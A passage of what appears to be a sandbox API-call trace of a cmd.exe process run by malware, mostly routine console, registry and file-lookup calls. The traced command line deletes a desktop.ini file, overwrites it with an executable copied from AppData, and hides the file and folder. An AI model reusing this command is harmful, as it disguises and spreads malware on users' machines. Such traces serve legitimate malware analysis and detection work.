Type=0x20000)) returned 0x1c [0136.324] VirtualQuery (in: lpAddress=0x2b0000, lpBuffer=0x2afa8c, dwLength=0x1c | out: lpBuffer=0x2afa8c*(BaseAddress=0x2b0000, AllocationBase=0x2b0000, AllocationProtect=0x2, RegionSize=0x2000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0136.324] GetConsoleOutputCP () returned 0x1b5 [0136.326] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0136.326] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0136.326] _get_osfhandle (_FileHandle=1) returned 0x7 [0136.326] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0136.328] _get_osfhandle (_FileHandle=1) returned 0x7 [0136.328] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0136.329] _get_osfhandle (_FileHandle=1) returned 0x7 [0136.329] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0136.331] _get_osfhandle (_FileHandle=0) returned 0x3 [0136.331] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0136.332] _get_osfhandle (_FileHandle=0) returned 0x3 [0136.332] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0136.353] GetEnvironmentStringsW () returned 0x3d0538* [0136.353] FreeEnvironmentStringsW (penv=0x3d0538) returned 1 [0136.354] GetEnvironmentStringsW () returned 0x3d0538* [0136.354] FreeEnvironmentStringsW (penv=0x3d0538) returned 1 [0136.354] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x2aea2c | out: phkResult=0x2aea2c*=0x40) returned 0x0 [0136.354] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x2aea34, lpData=0x2aea38, lpcbData=0x2aea30*=0x1000 | out: lpType=0x2aea34*=0x0, lpData=0x2aea38*=0xe8, lpcbData=0x2aea30*=0x1000) returned 0x2 [0136.354] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x2aea34, lpData=0x2aea38, lpcbData=0x2aea30*=0x1000 | out: lpType=0x2aea34*=0x4, lpData=0x2aea38*=0x1, lpcbData=0x2aea30*=0x4) returned 0x0 [0136.354] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x2aea34, lpData=0x2aea38, lpcbData=0x2aea30*=0x1000 | out: lpType=0x2aea34*=0x0, lpData=0x2aea38*=0x1, lpcbData=0x2aea30*=0x1000) returned 0x2 [0136.354] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x2aea34, lpData=0x2aea38, lpcbData=0x2aea30*=0x1000 | out: lpType=0x2aea34*=0x4, lpData=0x2aea38*=0x0, lpcbData=0x2aea30*=0x4) returned 0x0 [0136.354] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x2aea34, lpData=0x2aea38, lpcbData=0x2aea30*=0x1000 | out: lpType=0x2aea34*=0x4, lpData=0x2aea38*=0x40, lpcbData=0x2aea30*=0x4) returned 0x0 [0136.354] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x2aea34, lpData=0x2aea38, lpcbData=0x2aea30*=0x1000 | out: lpType=0x2aea34*=0x4, lpData=0x2aea38*=0x40, lpcbData=0x2aea30*=0x4) returned 0x0 [0136.354] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x2aea34, lpData=0x2aea38, lpcbData=0x2aea30*=0x1000 | out: lpType=0x2aea34*=0x0, lpData=0x2aea38*=0x40, lpcbData=0x2aea30*=0x1000) returned 0x2 [0136.354] RegCloseKey (hKey=0x40) returned 0x0 [0136.354] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x2aea2c | out: phkResult=0x2aea2c*=0x40) returned 0x0 [0136.354] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x2aea34, lpData=0x2aea38, lpcbData=0x2aea30*=0x1000 | out: lpType=0x2aea34*=0x0, lpData=0x2aea38*=0x40, lpcbData=0x2aea30*=0x1000) returned 0x2 [0136.354] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x2aea34, lpData=0x2aea38, lpcbData=0x2aea30*=0x1000 | out: lpType=0x2aea34*=0x4, lpData=0x2aea38*=0x1, lpcbData=0x2aea30*=0x4) returned 0x0 [0136.354] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x2aea34, lpData=0x2aea38, lpcbData=0x2aea30*=0x1000 | out: lpType=0x2aea34*=0x0, lpData=0x2aea38*=0x1, lpcbData=0x2aea30*=0x1000) returned 0x2 [0136.354] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x2aea34, lpData=0x2aea38, lpcbData=0x2aea30*=0x1000 | out: lpType=0x2aea34*=0x4, lpData=0x2aea38*=0x0, lpcbData=0x2aea30*=0x4) returned 0x0 [0136.354] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x2aea34, lpData=0x2aea38, lpcbData=0x2aea30*=0x1000 | out: lpType=0x2aea34*=0x4, lpData=0x2aea38*=0x9, lpcbData=0x2aea30*=0x4) returned 0x0 [0136.354] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x2aea34, lpData=0x2aea38, lpcbData=0x2aea30*=0x1000 | out: lpType=0x2aea34*=0x4, lpData=0x2aea38*=0x9, lpcbData=0x2aea30*=0x4) returned 0x0 [0136.354] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x2aea34, lpData=0x2aea38, lpcbData=0x2aea30*=0x1000 | out: lpType=0x2aea34*=0x0, lpData=0x2aea38*=0x9, lpcbData=0x2aea30*=0x1000) returned 0x2 [0136.354] RegCloseKey (hKey=0x40) returned 0x0 [0136.355] time (in: timer=0x0 | out: timer=0x0) returned 0x5b88636a [0136.355] srand (_Seed=0x5b88636a) [0136.355] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C attrib -r -s -h \"C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\u7E2T\\desktop.ini\" & del /f /q \"C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\u7E2T\\desktop.ini\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\u7E2T\\desktop.ini\" && attrib +h \"C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\u7E2T\\desktop.ini\" && attrib +h \"C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\u7E2T\"" [0136.355] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C attrib -r -s -h \"C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\u7E2T\\desktop.ini\" & del /f /q \"C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\u7E2T\\desktop.ini\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\u7E2T\\desktop.ini\" && attrib +h \"C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\u7E2T\\desktop.ini\" && attrib +h \"C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\u7E2T\"" [0136.355] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0136.355] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x3d1c98, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0136.355] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0136.355] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0136.355] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0136.355] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0136.355] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0136.355] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0136.355] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0136.355] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0136.355] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0136.355] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0136.356] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0136.356] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0136.356] GetEnvironmentStringsW () returned 0x3d2688* [0136.356] FreeEnvironmentStringsW (penv=0x3d2688) returned 1 [0136.356] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0136.356] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0136.356] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0136.356] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0136.356] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0136.356] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0136.356] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0136.356] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0136.356] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0136.356] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0136.356] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x2af7f8 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0136.356] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x2af7f8, lpFilePart=0x2af7f4 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x2af7f4*="Desktop") returned 0x18 [0136.356] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0136.356] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x2af574 | out: lpFindFileData=0x2af574) returned 0x3d0d18 [0136.357] FindClose (in: hFindFile=0x3d0d18 | out: hFindFile=0x3d0d18) returned 1 [0136.357] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x2af574 | out: lpFindFileData=0x2af574) returned 0x3d0d18 [0136.357] FindClose (in: hFindFile=0x3d0d18 | out: hFindFile=0x3d0d18) returned 1 [0136.357] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x2af574 | out: lpFindFileData=0x2af574) returned 0x3d0d18 [0136.357] FindClose (in: hFindFile=0x3d0d18 | out: hFindFile=0x3d0d18) returned 1 [0136.357] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0136.357] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0136.357] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0136.357] GetEnvironmentStringsW () returned 0x3d0538* [0136.357] FreeEnvironmentStringsW (penv=0x3d0538) returned 1 [0136.357] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0136.358] GetConsoleOutputCP () returned 0x1b5 [0136.369] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0136.369] GetUserDefaultLCID () returned 0x409 [0136.378] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0136.378] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x2af938, cchData=128 | out: lpLCData="0") returned 2 [0136.378] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x2af938, cchData=128 | out: lpLCData="0") returned 2 [0136.378] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x2af938, cchData=128 | out: lpLCData="1") returned 2 [0136.378] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0136.378] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0136.378] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0136.378] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0136.378] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0136.378] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0136.379] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0136.379] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0136.379] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0136.379] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0136.379] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0136.380] GetConsoleTitleW (in: lpConsoleTitle=0x3c0b30, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0136.399] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0136.400] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0136.400] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0136.400] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0136.401] _wcsicmp (_String1="attrib", _String2=")") returned 56 [0136.401] _wcsicmp (_String1="FOR", _String2="attrib") returned 5 [0136.401] _wcsicmp (_String1="FOR/?", _String2="attrib") returned 5 [0136.401] _wcsicmp (_String1="IF", _String2="attrib") returned 8 [0136.401] _wcsicmp (_String1="IF/?", _String2="attrib") returned 8 [0136.401] _wcsicmp (_String1="REM", _String2="attrib") returned 17 [0136.401] _wcsicmp (_String1="REM/?", _String2="attrib") returned 17 [0136.403] _wcsicmp (_String1="del", _String2=")") returned 59 [0136.403] _wcsicmp (_String1="FOR", _String2="del") returned 2 [0136.403] _wcsicmp (_String1="FOR/?", _String2="del") returned 2 [0136.403] _wcsicmp (_String1="IF", _String2="del") returned 5 [0136.403] _wcsicmp (_String1="IF/?", _String2="del") returned 5 [0136.403] _wcsicmp (_String1="REM", _String2="del") returned 14 [0136.403] _wcsicmp (_String1="REM/?", _String2="del") returned 14 [0136.405] _wcsicmp (_String1="type", _String2=")") returned 75 [0136.405] _wcsicmp (_String1="FOR", _String2="type") returned -14 [0136.405] _wcsicmp (_String1="FOR/?", _String2="type") returned -14 [0136.405] _wcsicmp (_String1="IF", _String2="type") returned -11 [0136.405] _wcsicmp (_String1="IF/?", _String2="type") returned -11 [0136.405] _wcsicmp (_String1="REM", _String2="type") returned -2 [0136.405] _wcsicmp (_String1="REM/?", _String2="type") returned -2 [0136.639] SetErrorMode (uMode=0x0) returned 0x0 [0136.639] SetErrorMode (uMode=0x1) returned 0x0 [0136.639] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3d05f0, lpFilePart=0x2af0ec | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x2af0ec*="Desktop") returned 0x18 [0136.639] SetErrorMode (uMode=0x0) returned 0x1 [0136.639] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0136.639] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0136.643] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0136.644] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\attrib.*", fInfoLevelId=0x1, lpFindFileData=0x2aee68, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2aee68) returned 0xffffffff [0136.644] GetLastError () returned 0x2 [0136.644] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\attrib", fInfoLevelId=0x1, lpFindFileData=0x2aee68, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2aee68) returned 0xffffffff [0136.644] GetLastError () returned 0x2 [0136.644] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.*", fInfoLevelId=0x1, lpFindFileData=0x2aee68, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2aee68) returned 0x3d2600 [0136.644] FindClose (in: hFindFile=0x3d2600 | out: hFindFile=0x3d2600) returned 1 [0136.644] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.COM", fInfoLevelId=0x1, lpFindFileData=0x2aee68, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2aee68) returned 0xffffffff [0136.644] GetLastError () returned 0x2 [0136.644] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.EXE", fInfoLevelId=0x1, lpFindFileData=0x2aee68, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2aee68) returned 0x3d2600 [0136.645] FindClose (in: hFindFile=0x3d2600 | out: hFindFile=0x3d2600) returned 1 [0136.645] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0136.645] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0136.645] GetConsoleTitleW (in: lpConsoleTitle=0x2af360, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0136.645] InitializeProcThreadAttributeList (in: lpAttributeList=0x2af1e8, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x2af2b0 | out: lpAttributeList=0x2af1e8, lpSize=0x2af2b0) returned 1 [0136.645] UpdateProcThreadAttribute (in: lpAttributeList=0x2af1e8, dwFlags=0x0, Attribute=0x60001, lpValue=0x2af2a8, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x2af1e8, lpPreviousValue=0x0) returned 1 [0136.645] GetStartupInfoW (in: lpStartupInfo=0x2af1a4 | out: lpStartupInfo=0x2af1a4*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0136.645] lstrcmpW (lpString1="\\attrib.exe", lpString2="\\XCOPY.EXE") returned -1 [0136.646] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\attrib.exe", lpCommandLine="attrib -r -s -h \"C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\u7E2T\\desktop.ini\" ", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\EEBsYm5\\Desktop", lpStartupInfo=0x2af244*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="attrib -r -s -h \"C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\u7E2T\\desktop.ini\" ", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x2af290 | out: lpCommandLine="attrib -r -s -h \"C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\u7E2T\\desktop.ini\" ", lpProcessInformation=0x2af290*(hProcess=0x50, hThread=0x4c, dwProcessId=0xd78, dwThreadId=0xd74)) returned 1 [0136.652] CloseHandle (hObject=0x4c) returned 1 [0136.652] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0136.652] GetEnvironmentStringsW () returned 0x3d0b18* [0136.652] FreeEnvironmentStringsW (penv=0x3d0b18) returned 1 [0136.652] WaitForSingleObject (hHandle=0x50, dwMilliseconds=0xffffffff) returned 0x0 [0136.825] GetExitCodeProcess (in: hProcess=0x50, lpExitCode=0x2af184 | out: lpExitCode=0x2af184*=0x0) returned 1 [0136.825] CloseHandle (hObject=0x50) returned 1 [0136.825] _vsnwprintf (in: _Buffer=0x2af2cc, _BufferCount=0x13, _Format="%08X", _ArgList=0x2af190 | out: _Buffer="00000000") returned 8 [0136.825] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0136.825] GetEnvironmentStringsW () returned 0x3d2670* [0136.825] FreeEnvironmentStringsW (penv=0x3d2670) returned 1 [0136.825] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0136.825] GetEnvironmentStringsW () returned 0x3d2670* [0136.825] FreeEnvironmentStringsW (penv=0x3d2670) returned 1 [0136.825] DeleteProcThreadAttributeList (in: lpAttributeList=0x2af1e8 | out: lpAttributeList=0x2af1e8) [0136.825] GetConsoleTitleW (in: lpConsoleTitle=0x2af568, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0136.826] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x0, lpMaximumComponentLength=0x2ae5e0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x2ae5e4, nFileSystemNameSize=0x106 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x0, lpMaximumComponentLength=0x2ae5e0*=0xff, lpFileSystemFlags=0x0, lpFileSystemNameBuffer="NTFS") returned 1 [0136.826] _wcsicmp (_String1="NTFS", _String2="FAT") returned 8 [0136.830] _wcsicmp (_String1="desktop.ini", _String2=".") returned 54 [0136.830] _wcsicmp (_String1="desktop.ini", _String2="..") returned 54 [0136.830] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\u7E2T\\desktop.ini" (normalized: "c:\\users\\eebsym5\\desktop\\lp6y\\hqvibu00\\u7e2t\\desktop.ini")) returned 0xffffffff [0136.830] GetLastError () returned 0x2 [0136.830] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\u7E2T" (normalized: "c:\\users\\eebsym5\\desktop\\lp6y\\hqvibu00\\u7e2t")) returned 0x10 [0136.830] _wcsicmp (_String1="desktop.ini", _String2=".") returned 54 [0136.830] _wcsicmp (_String1="desktop.ini", _String2="..") returned 54 [0136.830] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\u7E2T\\desktop.ini" (normalized: "c:\\users\\eebsym5\\desktop\\lp6y\\hqvibu00\\u7e2t\\desktop.ini")) returned 0xffffffff [0136.830] GetLastError () returned 0x2 [0136.830] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\u7E2T\\desktop.ini", fInfoLevelId=0x0, lpFindFileData=0x3d376c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3d376c) returned 0xffffffff [0136.830] GetLastError () returned 0x2 [0136.830] _get_osfhandle (_FileHandle=2) returned 0xb [0136.830] GetFileType (hFile=0xb) returned 0x2 [0136.831] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0136.831] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x2aefe0 | out: lpMode=0x2aefe0) returned 1 [0136.831] _get_osfhandle (_FileHandle=2) returned 0xb [0136.831] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xb, lpConsoleScreenBufferInfo=0x2af014 | out: lpConsoleScreenBufferInfo=0x2af014) returned 1 [0136.831] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x40002712, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="Could Not Find %1\r\n") returned 0x13 [0136.832] _get_osfhandle (_FileHandle=1) returned 0x7 [0136.832] _get_osfhandle (_FileHandle=1) returned 0x7 [0136.832] _get_osfhandle (_FileHandle=1) returned 0x7 [0136.832] GetFileType (hFile=0x7) returned 0x2 [0136.832] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0136.832] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x2af704 | out: lpMode=0x2af704) returned 1 [0136.833] _dup (_FileHandle=1) returned 3 [0136.833] _close (_FileHandle=1) returned 0 [0136.833] _wcsicmp (_String1="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\u7E2T\\desktop.ini", _String2="con") returned -53 [0136.833] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\u7E2T\\desktop.ini" (normalized: "c:\\users\\eebsym5\\desktop\\lp6y\\hqvibu00\\u7e2t\\desktop.ini"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x2af6d4, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x50 [0136.837] _open_osfhandle (_OSFileHandle=0x50, _Flags=8) returned 1 [0136.837] GetConsoleTitleW (in: lpConsoleTitle=0x2af504, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0136.838] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe", fInfoLevelId=0x1, lpFindFileData=0x2af068, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2af068) returned 0x3d1488 [0136.838] _wcsicmp (_String1="XEY8d7zI.exe", _String2=".") returned 74 [0136.838] _wcsicmp (_String1="XEY8d7zI.exe", _String2="..") returned 74 [0136.838] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\vmfcce~1\\xey8d7zi.exe")) returned 0x2020 [0136.838] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\vmfcce~1\\xey8d7zi.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x2adf74, dwCreationDisposition=0x3, 